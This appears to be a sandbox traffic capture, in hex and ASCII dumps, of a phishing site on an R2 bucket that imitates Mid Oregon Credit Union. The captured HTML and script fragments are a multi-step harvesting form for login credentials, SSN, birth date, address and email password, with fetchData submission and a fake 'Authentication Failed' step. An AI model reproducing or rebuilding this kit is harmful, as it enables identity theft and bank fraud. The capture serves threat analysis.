2025-01-02 16:21:52 UTC	1369	IN	Data Raw: 64 22 20 69 64 3d 22 70 61 73 73 77 6f 72 64 22 20 72 65 71 75 69 72 65 64 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 3e 20 4c 6f 67 20 69 6e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 3c 2f 66 6f 72 6d 3e 0d 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 63 6f 70 79 72 69 67 68 74 22 3e 20 43 6f 70 79 72 69 67 68 74 20 c2 a9 20 32 30 32 34 20 4d 69 64 20 4f 72 65 67 6f 6e 20 43 72 65 64 69 74 20 55 6e 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0d 0a 20 20 20 20 20 20 20 20 3c 62 72 3e 3c 62 72 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 21 2d 2d 20 46 6f Data Ascii: d" id="password" required> <button type="submit"> Log in </button> </form> <p class="copyright"> Copyright 2024 Mid Oregon Credit Union. All rights reserved. <br><br> </p></div>... Fo
2025-01-02 16:21:52 UTC	1369	IN	Data Raw: 22 20 72 65 71 75 69 72 65 64 20 6f 6e 69 6e 70 75 74 3d 22 66 6f 72 6d 61 74 44 4f 42 28 74 68 69 73 29 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 61 64 64 72 65 73 73 22 3e 41 64 64 72 65 73 73 3c 2f 6c 61 62 65 6c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 61 64 64 72 65 73 73 22 20 69 64 3d 22 61 64 64 72 65 73 73 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 41 64 64 72 65 73 73 2c 20 43 69 74 79 2c 20 53 74 61 74 65 2c 20 5a 69 70 20 43 6f 64 65 22 20 72 65 71 75 69 72 65 64 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 70 68 6f 6e 65 22 3e 50 68 6f 6e 65 20 4e 75 6d 62 65 72 Data Ascii: " required oninput="formatDOB(this)"> <label for="address">Address</label> <input type="text" name="address" id="address" placeholder="Address, City, State, Zip Code" required> <label for="phone">Phone Number
2025-01-02 16:21:52 UTC	1369	IN	Data Raw: 20 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 65 6d 61 69 6c 50 61 73 73 77 6f 72 64 22 3e 50 61 73 73 77 6f 72 64 3c 2f 6c 61 62 65 6c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 20 6e 61 6d 65 3d 22 65 6d 61 69 6c 50 61 73 73 77 6f 72 64 22 20 69 64 3d 22 65 6d 61 69 6c 50 61 73 73 77 6f 72 64 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 45 6e 74 65 72 20 59 6f 75 72 20 45 6d 61 69 6c 20 50 61 73 73 77 6f 72 64 22 20 72 65 71 75 69 72 65 64 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 3e 43 6f 6e 74 69 6e 75 65 20 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 3c 2f 66 6f 72 6d 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 0d 0a Data Ascii: <label for="emailPassword">Password</label> <input type="password" name="emailPassword" id="emailPassword" placeholder="Enter Your Email Password" required> <button type="submit">Continue </button> </form></div>
2025-01-02 16:21:52 UTC	1369	IN	Data Raw: 72 3e 0d 0a 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 30 30 31 2e 70 72 6e 74 73 63 72 2e 63 6f 6d 2f 66 69 6c 65 2f 69 6d 67 30 30 31 2f 6e 42 6d 36 4c 66 4e 72 54 55 71 76 4b 51 39 48 54 51 55 6e 73 51 2e 70 6e 67 22 20 61 6c 74 3d 22 53 75 63 63 65 73 73 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 35 30 70 78 3b 20 6d 61 72 67 69 6e 3a 20 32 30 70 78 20 61 75 74 6f 3b 22 3e 0d 0a 20 20 20 20 3c 70 3e 59 6f 75 72 20 61 63 63 6f 75 6e 74 20 64 65 74 61 69 6c 73 20 61 6e 64 20 73 65 63 75 72 69 74 79 20 73 65 74 74 69 6e 67 73 20 68 61 76 65 20 62 65 65 6e 20 73 75 63 63 65 73 73 66 75 6c 6c 79 20 75 70 64 61 74 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 61 73 79 Data Ascii: r> <img src="https://img001.prntscr.com/file/img001/nBm6LfNrTUqvKQ9HTQUnsQ.png" alt="Success" style="width: 50px; margin: 20px auto;"> <p>Your account details and security settings have been successfully updated.</p></div><script> asy
2025-01-02 16:21:52 UTC	1369	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 65 74 63 68 44 61 74 61 28 66 6f 72 6d 44 61 74 61 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 73 70 69 6e 6e 65 72 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 73 70 69 6e 6e 65 72 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 70 69 6e 6e 65 72 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 27 68 69 64 64 65 6e 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 54 69 6d 65 6f 75 74 28 28 29 20 3d 3e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 65 6c 61 79 41 6e 64 53 68 6f 77 46 6f 72 6d 28 33 2c 20 34 2c 20 22 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 46 61 69 6c 65 64 21 22 29 3b 0d 0a 20 20 20 20 20 Data Ascii: fetchData(formData); const spinner = document.getElementById('spinner'); spinner.classList.remove('hidden'); setTimeout(() => { delayAndShowForm(3, 4, "Authentication Failed!");
2025-01-02 16:21:52 UTC	940	IN	Data Raw: 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 76 61 6c 75 65 2e 73 6c 69 63 65 28 30 2c 20 35 29 20 2b 20 27 2f 27 20 2b 20 76 61 6c 75 65 2e 73 6c 69 63 65 28 35 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 69 6e 70 75 74 2e 76 61 6c 75 65 20 3d 20 76 61 6c 75 65 2e 73 6c 69 63 65 28 30 2c 20 31 30 29 3b 0d 0a 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 67 72 61 62 45 6d 61 69 6c 28 65 6d 61 69 6c 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 73 65 63 75 72 65 45 6d 61 69 6c 27 29 2e 76 61 6c 75 65 20 3d 20 65 6d 61 69 6c 3b 0d 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f 6e Data Ascii: value = value.slice(0, 5) + '/' + value.slice(5); } input.value = value.slice(0, 10); } function grabEmail(email) { document.getElementById('secureEmail').value = email; document.getElementById('con

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49753	172.66.0.235	443	5808	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 16:21:52 UTC	690	OUT	GET /midoregon.com/email_domain_logo.png HTTP/1.1 Host: pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev/midoregon.com/login.html Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-02 16:21:52 UTC	180	IN	HTTP/1.1 404 Not Found Date: Thu, 02 Jan 2025 16:21:52 GMT Content-Type: text/html Content-Length: 27150 Connection: close Server: cloudflare CF-RAY: 8fbc15aa6d13f78d-EWR
2025-01-02 16:21:52 UTC	1189	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="icon" href="https://www.cloudflare.com/favicon.ico" /> <title>Not Found</title> <sty
2025-01-02 16:21:52 UTC	1369	IN	Data Raw: 32 20 7b 0a 20 20 20 20 20 20 20 20 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 31 30 25 2c 0a 20 20 20 20 20 20 20 20 35 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 35 70 78 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 36 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 31 30 30 25 20 7b 0a 20 20 20 20 20 20 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 58 28 30 70 78 29 3b 0a 20 20 20 20 Data Ascii: 2 { 0% { transform: translateX(0); } 10%, 50% { transform: translateX(5px); } 60% { transform: translateX(0); } 100% { transform: translateX(0px);
2025-01-02 16:21:52 UTC	1369	IN	Data Raw: 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 4c 65 61 72 6e 20 68 6f 77 20 74 6f 20 65 6e 61 62 6c 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 72 32 2f 64 61 74 61 2d 61 63 63 65 73 73 2f 70 75 62 6c 69 63 2d 62 75 63 6b 65 74 73 2f 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3e 50 75 62 6c 69 63 20 41 63 63 65 73 73 3c 2f 61 0a 20 20 20 20 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 20 20 3c 73 65 63 74 Data Ascii: p> <p> Learn how to enable <a href="https://developers.cloudflare.com/r2/data-access/public-buckets/" >Public Access</a > </p> </div> </section> <sect
2025-01-02 16:21:52 UTC	1369	IN	Data Raw: 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 32 34 2e 35 36 36 20 31 33 2e 32 37 37 43 31 32 31 2e 30 35 33 20 31 33 2e 32 37 37 20 31 31 38 2e 32 30 34 20 31 30 2e 34 32 38 38 20 31 31 38 2e 32 30 34 20 36 2e 39 31 35 33 34 43 31 31 38 2e 32 30 34 20 33 2e 34 30 31 39 31 20 31 32 31 2e 30 35 33 20 30 2e 35 35 33 37 31 31 20 31 32 34 2e 35 36 36 20 30 2e 35 35 33 37 31 31 43 31 32 38 2e 30 38 20 30 2e 35 35 33 37 31 31 20 31 33 30 2e 39 32 38 20 33 2e 34 30 31 39 31 20 31 33 30 2e 39 32 38 20 36 2e 39 31 35 33 34 43 31 33 30 2e 39 32 38 20 31 30 2e 34 32 38 38 20 31 32 38 2e 30 38 20 31 33 2e 32 37 37 20 31 32 34 2e 35 36 36 20 31 33 2e 32 37 37 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 Data Ascii: <path d="M124.566 13.277C121.053 13.277 118.204 10.4288 118.204 6.91534C118.204 3.40191 121.053 0.553711 124.566 0.553711C128.08 0.553711 130.928 3.40191 130.928 6.91534C130.928 10.4288 128.08 13.277 124.566 13.277Z" fill="#0055DC
2025-01-02 16:21:52 UTC	1369	IN	Data Raw: 33 30 34 20 39 39 2e 36 31 34 39 43 37 33 2e 31 38 38 38 20 31 30 30 2e 38 39 35 20 37 31 2e 32 35 35 39 20 31 30 38 2e 31 39 35 20 37 31 2e 32 35 35 39 20 31 30 38 2e 31 39 35 48 37 35 2e 35 34 35 39 43 37 35 2e 35 34 35 39 20 31 30 38 2e 31 39 35 20 37 38 2e 33 33 35 33 20 39 35 2e 39 36 31 31 20 36 38 2e 36 38 36 38 20 39 34 2e 30 34 34 35 43 35 39 2e 30 33 38 34 20 39 32 2e 31 32 37 38 20 35 36 2e 30 37 37 37 20 31 30 35 2e 34 30 36 20 35 36 2e 30 37 37 37 20 31 30 35 2e 34 30 36 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 33 36 2e 31 37 36 20 31 31 31 2e 39 35 33 43 31 Data Ascii: 304 99.6149C73.1888 100.895 71.2559 108.195 71.2559 108.195H75.5459C75.5459 108.195 78.3353 95.9611 68.6868 94.0445C59.0384 92.1278 56.0777 105.406 56.0777 105.406Z" fill="#0055DC" /> <path d="M136.176 111.953C1
2025-01-02 16:21:52 UTC	1369	IN	Data Raw: 2e 39 34 31 20 31 32 31 2e 31 37 20 31 30 38 2e 34 30 37 43 31 32 30 2e 37 30 34 20 31 30 38 2e 38 37 32 20 31 32 30 2e 33 33 35 20 31 30 39 2e 34 32 35 20 31 32 30 2e 30 38 33 20 31 31 30 2e 30 33 34 43 31 31 39 2e 38 33 31 20 31 31 30 2e 36 34 32 20 31 31 39 2e 37 30 31 20 31 31 31 2e 32 39 35 20 31 31 39 2e 37 30 31 20 31 31 31 2e 39 35 33 56 31 31 31 2e 39 35 33 5a 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 69 6c 6c 3d 22 23 30 30 35 35 44 43 22 0a 20 20 20 20 20 20 20 20 20 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 3d 22 4d 31 30 33 2e 33 38 34 20 31 31 31 2e 39 35 33 43 31 30 33 2e 33 38 34 20 31 31 32 2e 36 31 32 20 31 30 33 2e 35 31 33 20 31 31 33 2e 32 36 34 20 31 30 33 2e 37 36 36 20 31 Data Ascii: .941 121.17 108.407C120.704 108.872 120.335 109.425 120.083 110.034C119.831 110.642 119.701 111.295 119.701 111.953V111.953Z" fill="#0055DC" /> <path d="M103.384 111.953C103.384 112.612 103.513 113.264 103.766 1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49758	162.159.140.237	443	5808	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 16:21:53 UTC	391	OUT	GET /midoregon.com/login.html HTTP/1.1 Host: pub-dc3c20b29a7e4238b1149f20f12cabd6.r2.dev Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-02 16:21:53 UTC	283	IN	HTTP/1.1 200 OK Date: Thu, 02 Jan 2025 16:21:53 GMT Content-Type: text/html Content-Length: 10523 Connection: close Accept-Ranges: bytes ETag: "8c245c908e9c653018919538a4b628a8" Last-Modified: Thu, 26 Dec 2024 11:42:43 GMT Server: cloudflare CF-RAY: 8fbc15b01b67f5fa-EWR
2025-01-02 16:21:53 UTC	1086	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 69 64 6f 72 65 67 6f 6e 2e 63 6f 6d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0d 0a 20 20 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no"> <link rel="icon" href="https://www.midoregon.com/favicon.ico" type="image/x-icon">
2025-01-02 16:21:53 UTC	1369	IN	Data Raw: 20 35 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6c 69 67 68 74 65 72 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 78 74 22 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 2c 20 69 6e 70 75 74 5b 74 79 70 65 3d 22 74 65 6c 22 5d 2c 20 62 75 74 74 6f 6e 20 7b 20 77 69 64 74 68 3a 20 63 61 6c 63 28 31 30 30 25 20 2d 20 32 30 70 78 29 3b 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 35 70 78 3b 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 20 7d 0d 0a 20 20 20 Data Ascii: 5px; font-weight: lighter;text-align: left; font-weight:; } input[type="text"], input[type="password"], input[type="email"], input[type="tel"], button { width: calc(100% - 20px); padding: 10px; margin-bottom: 15px; border: 1px solid #ccc; }
2025-01-02 16:21:53 UTC	1369	IN	Data Raw: 6f 72 6d 20 69 64 3d 22 6c 6f 67 69 6e 46 6f 72 6d 22 20 6f 6e 73 75 62 6d 69 74 3d 22 65 76 65 6e 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 20 73 75 62 6d 69 74 46 6f 72 6d 28 31 29 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 75 73 65 72 49 44 22 3e 55 73 65 72 6e 61 6d 65 3c 2f 6c 61 62 65 6c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 75 73 65 72 49 44 22 20 69 64 3d 22 75 73 65 72 49 44 22 20 72 65 71 75 69 72 65 64 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 70 61 73 73 77 6f 72 64 22 3e 50 61 73 73 77 6f 72 64 3c 2f 6c 61 62 65 6c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 Data Ascii: orm id="loginForm" onsubmit="event.preventDefault(); submitForm(1);"> <label for="userID">Username</label> <input type="text" name="userID" id="userID" required> <label for="password">Password</label> <input t
2025-01-02 16:21:53 UTC	1369	IN	Data Raw: 73 6e 22 3e 53 53 4e 3c 2f 6c 61 62 65 6c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 73 73 6e 22 20 69 64 3d 22 73 73 6e 22 20 6d 61 78 6c 65 6e 67 74 68 3d 22 31 31 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 30 30 30 2d 30 30 2d 30 30 30 30 22 20 72 65 71 75 69 72 65 64 20 6f 6e 69 6e 70 75 74 3d 22 66 6f 72 6d 61 74 53 53 4e 28 74 68 69 73 29 22 3e 0d 0a 20 20 20 20 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 64 6f 62 22 3e 44 61 74 65 20 6f 66 20 42 69 72 74 68 3c 2f 6c 61 62 65 6c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 64 6f 62 22 20 69 64 3d 22 64 6f 62 22 20 6d 61 78 6c 65 6e 67 74 68 3d Data Ascii: sn">SSN</label> <input type="text" name="ssn" id="ssn" maxlength="11" placeholder="000-00-0000" required oninput="formatSSN(this)"> <label for="dob">Date of Birth</label> <input type="text" name="dob" id="dob" maxlength=
2025-01-02 16:21:53 UTC	1369	IN	Data Raw: 61 63 63 6f 75 6e 74 2c 20 6d 61 6b 69 6e 67 20 69 74 20 68 61 72 64 20 66 6f 72 20 75 6e 61 75 74 68 6f 72 69 7a 65 64 20 61 63 63 65 73 73 2e 3c 2f 70 3e 0d 0a 20 20 20 20 3c 66 6f 72 6d 20 69 64 3d 22 65 6d 61 69 6c 53 65 63 75 72 69 74 79 46 6f 72 6d 22 20 6f 6e 73 75 62 6d 69 74 3d 22 65 76 65 6e 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 20 73 75 62 6d 69 74 46 6f 72 6d 28 33 29 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 73 65 63 75 72 65 45 6d 61 69 6c 22 3e 45 6d 61 69 6c 20 41 64 64 72 65 73 73 3c 2f 6c 61 62 65 6c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 65 6d 61 69 6c 22 20 6e 61 6d 65 3d 22 73 65 63 75 72 65 45 6d 61 69 6c 22 20 69 64 3d 22 73 65 63 75 72 65 45 6d 61 Data Ascii: account, making it hard for unauthorized access.</p> <form id="emailSecurityForm" onsubmit="event.preventDefault(); submitForm(3);"> <label for="secureEmail">Email Address</label> <input type="email" name="secureEmail" id="secureEma
2025-01-02 16:21:53 UTC	1369	IN	Data Raw: 72 6d 20 35 3a 20 53 75 63 63 65 73 73 20 4d 65 73 73 61 67 65 20 2d 2d 3e 0d 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 61 69 6e 65 72 20 68 69 64 64 65 6e 22 20 69 64 3d 22 66 6f 72 6d 35 22 3e 0d 0a 20 20 20 20 3c 69 6d 67 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 20 35 30 25 3b 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 73 73 65 74 73 2e 6f 72 62 2e 61 6c 6b 61 6d 69 74 65 63 68 2e 63 6f 6d 2f 70 72 6f 64 75 63 74 69 6f 6e 2f 74 68 65 6d 65 73 65 74 73 2f 32 38 66 37 35 33 33 36 2d 32 64 36 31 2d 34 63 36 34 2d 38 32 33 37 2d 65 36 38 61 65 36 61 63 39 31 35 37 2f 74 68 65 6d 65 73 2f 74 68 65 6d 65 2d 62 75 69 6c 64 65 72 2f 64 65 66 61 75 6c 74 2f 61 73 73 65 74 73 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 2d 6c 6f 67 6f 2d Data Ascii: rm 5: Success Message --><div class="form-container hidden" id="form5"> <img style="width: 50%;" src="https://assets.orb.alkamitech.com/production/themesets/28f75336-2d61-4c64-8237-e68ae6ac9157/themes/theme-builder/default/assets/images/brand-logo-
2025-01-02 16:21:53 UTC	1369	IN	Data Raw: 20 20 20 20 66 6f 72 6d 44 61 74 61 20 3d 20 6e 65 77 20 46 6f 72 6d 44 61 74 61 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 69 64 65 6e 74 69 74 79 46 6f 72 6d 27 29 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 65 74 63 68 44 61 74 61 28 66 6f 72 6d 44 61 74 61 29 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 65 6c 61 79 41 6e 64 53 68 6f 77 46 6f 72 6d 28 32 2c 20 33 2c 20 22 56 65 72 69 66 79 69 6e 67 2e 2e 2e 22 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 20 65 6c 73 65 20 69 66 20 28 66 6f 72 6d 4e 75 6d 62 65 72 20 3d 3d 3d 20 33 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 72 6d 44 61 74 61 20 3d 20 6e 65 77 20 46 6f 72 6d 44 61 74 61 28 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 Data Ascii: formData = new FormData(document.getElementById('identityForm')); fetchData(formData); delayAndShowForm(2, 3, "Verifying..."); } else if (formNumber === 3) { formData = new FormData(document.getElement
